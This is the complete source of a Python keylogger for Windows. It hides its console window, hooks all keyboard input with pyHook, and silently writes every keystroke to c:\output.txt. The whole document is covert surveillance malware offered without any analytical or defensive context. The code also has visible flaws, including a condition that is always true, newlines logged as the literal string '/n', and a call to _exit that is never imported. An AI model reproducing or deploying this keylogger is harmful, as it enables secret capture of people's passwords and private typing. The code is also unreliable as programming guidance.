

E:\keylogger.py

```
1  # Python code for keylogger
2  # to be used in windows
3  import win32api
4  import win32console
5  import win32gui
6  import pythoncom, pyHook
7
8  win = win32console.GetConsoleWindow()
9  win32gui.ShowWindow(win, 0)
10
11 def OnKeyboardEvent(event):
12     if event.Ascii==5:
13         _exit(1)
14     if event.Ascii !=0 or 8:
15         #open output.txt to read current keystrokes
16         f = open('c:\output.txt', 'r+')
17         buffer = f.read()
18         f.close()
19         # open output.txt to write current + new keystrokes
20         f = open('c:\output.txt', 'w')
21         keylogs = chr(event.Ascii)
22         if event.Ascii == 13:
23             keylogs = '/n'
24         buffer += keylogs
25         f.write(buffer)
26         f.close()
27 # create a hook manager object
28 hm = pyHook.HookManager()
29 hm.KeyDown = OnKeyboardEvent
30 # set the hook
31 hm.HookKeyboard()
32 # wait forever
33 pythoncom.PumpMessages()
34
```